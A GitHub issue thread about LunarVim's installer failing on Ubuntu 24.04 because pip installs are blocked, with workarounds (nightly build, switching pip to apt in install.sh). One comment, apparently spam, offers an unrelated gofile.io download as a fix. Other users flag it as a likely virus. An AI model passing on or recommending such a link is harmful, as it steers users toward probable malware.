### ISSUE TITLE
LunarVim's Python dependencies fail to install on Ubuntu

### ISSUE THREAD

**Issue by MichelAguilera** [ChristianChiarulli/nvcode#4605]
### Problem description

The installation script uses pip to install the python dependencies for LunarVim. This feature is discouraged in Ubuntu and throws and error; see this [askubuntu.com](https://askubuntu.com/questions/1465218/pip-error-on-ubuntu-externally-managed-environment-%C3%97-this-environment-is-extern) question.

This is my second time setting up LunarVim on Ubuntu and I ran into this issue before. My solution was to edit the install script to use `apt` instead of pip for the python dependencies.

Steps to reproduce are listed in its own box.

### LunarVim version

1.4.0

### Neovim version (>= 0.9.1)

0.9.5

### Terminal name

Wezterm

### Operating system/version

Ubuntu 24.04

### Steps to reproduce

1. Install prerequisites individually as denoted in https://www.lunarvim.org/docs/installation
2. Run: ```LV_BRANCH='release-1.4/neovim-0.9' bash <(curl -s https://raw.githubusercontent.com/LunarVim/LunarVim/release-1.4/neovim-0.9/utils/installer/install.sh)```
3. Follow the installation instructions like normal
4. On saying yes to installing Python dependencies, pip error occurs

### Screenshots

![Screenshot from 2024-09-04 09-10-14](https://github.com/user-attachments/assets/e337b303-ab72-4a2f-80fc-92ce6beebc0a)

**Comment by Nikhiludupa** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by erickcestari** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

Dont install it, probably is a virus.

I am facing the same problem, btw

**Comment by erickcestari** [comment]
I used the nightly version and installed normally. Because the nightly version doesn't use any python lib

https://www.lunarvim.org/docs/installation#nightly

**Comment by MichelAguilera** [comment]
> > try this https://gofile.io/d/yMHabA select the desired compiler in the installer
> 
> 
> 
> Dont install it, probably is a virus.
> 
> 
> 
> I am facing the same problem, btw

Yeah, I reported the bot.

If you're facing the same issue, try doing what I did. 

You'll have to download the tar.gz from the releases, go into utils directory and modify the 'install.sh'. 

Replace the pip installs with apt installs and it should work.

Then just run the script.

It's not a general solution but it should work for Ubuntu installs.

I'll post the changes to this thread as a stop-gap measure for other people facing the same issue later.
